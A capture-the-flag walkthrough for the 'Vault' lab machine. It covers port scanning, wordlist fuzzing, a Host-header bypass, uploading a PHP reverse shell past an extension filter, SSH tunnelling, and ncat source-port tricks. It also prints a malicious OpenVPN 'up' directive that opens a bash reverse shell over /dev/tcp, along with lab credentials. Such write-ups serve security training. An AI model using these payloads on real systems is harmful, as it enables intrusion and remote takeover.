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3​rd​ April 2019 / Document No D19.100.12

Prepared By: egre55
Machine Author: nol0gz
Difficulty: ​Medium
Classification: Official

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Vault is medium to hard difficulty machine, which requires bypassing host and file upload
restrictions, tunneling, creating malicious OpenVPN configuration files and PGP decryption.

Skills Required Skills Learned

● Basic knowledge of Web application ● Creating malicious OpenVPN

enumeration techniques configuration files
● Intermediate knowledge of Linux ● SSH port forwarding
● Bypassing port restrictions using ncat

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masscan -p1-65535,U:1-65535 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports

ports=$(cat ports | awk -F ​" "​ ​'{print $4}'​ | awk -F ​"/"​ ​'{print $1}'​ | sort -n | tr ​'\n'
','​ | sed ​'s/,$//'​)
nmap -Pn -sV -sC -p​$ports​

Nmap output reveals that SSH and an Apache web server are available. Visual inspection of the
website reveals some text about a service that is being offered.

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Cewl is used to generate a wordlist based on words found on the site, and wfuzz finds the
directory "sparklays".

cewl | tr ​'[:upper:]'​ ​'[:lower:]'​ > vault.txt

wfuzz -u -w vault.txt -R2 --hc 404

Navigating to this page results in a 403 Forbidden, so enumeration with wfuzz continues.

wfuzz -u -w /usr/share/dirb/wordlists/common.txt

-R2 --hc 404 --hl 11

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The page "admin.php", directory "design" and subdirectory "uploads" have been found.

After sending this request to Burp, and changing the Host header value to "localhost", the admin
page is accessible.

"Design Settings" links to "/sparkleys/design/design.html"

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Foothold (

Bypassing File Upload Restriction

The "Design Settings" page provides functionality to upload a logo, although there are
restrictions on the file extension. However, php5 extensions are permitted.

After uploading and executing a php reverse shell (e.g. in Kali

/usr/share/webshells/php/php-reverse-shell.php), a foothold on "Ubuntu" ( is

There is a user "dave", and enumeration reveals SSH credentials and other useful information on
their desktop.

SSH: ​dave:Dav3therav3123
Key: itscominghome

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SSH Port Forwarding

A netcat scan of reveals that ports 22 and 80 are open.

nc -vz 1-100

SSH is used to forward port 80 on to port 8000 locally.

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Malicious OpenVPN Configuration File

The webpage contains functionality to edit and test an OpenVPN configuration file.

Wfuzz finds the file "notes".

This reveals that the .ovpn file has been chmod 777, and is editable by www-data.

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An informative blog post by Jacob Baines details the exploitation of OpenVPN configuration files.

Using this as reference, the payload below is created, and after clicking "Test VPN", and reverse
shell is received as root@DNS, and the user flag on Dave’s desktop can be captured.

dev tun
script-security 2
up ​"/bin/bash -c '/bin/bash -i > /dev/tcp/ 0<&1 2>&1&'"

SSH credentials to access are found in Dave’s home directory. Dave is able to run
any command as root using sudo.


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Vault (

The file /var/log/auth.log is examined, and interesting nmap and ncat commands targeting are visible.

Nmap reveals the closed ports 53 and 4444. Specifying either port 53 or 4444 as the source port
reveals that port 987 is open.

ncat (with source port set to 53) reveals that SSH is listening on port 987.

A ncat listener is stood up, to connect to on port 987.

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ncat -l 4444 --sh-exec ​"ncat 987 -p 53"​ &

It is now possible to ssh to Vault as Dave using the password dav3gerous567, specifying port

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PGP Encrypted Root Flag

Enumeration of Dave’s home directory reveals a PGP encrypted root flag. GPG can be used to
decrypt this, and it is installed on all hosts. However, there are no keys on Vault or DNS. The ID of
the key used to encrypt the file is "D1EB1F03".

This key is available on the host "Ubuntu".

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A further ncat listener is established in order to transfer to the file from Vault to DNS using SCP.

This is then transferred to Ubuntu.

scp dave@ .

The file is successfully decrypted using the passphrase "itscominghome" and the root flag is

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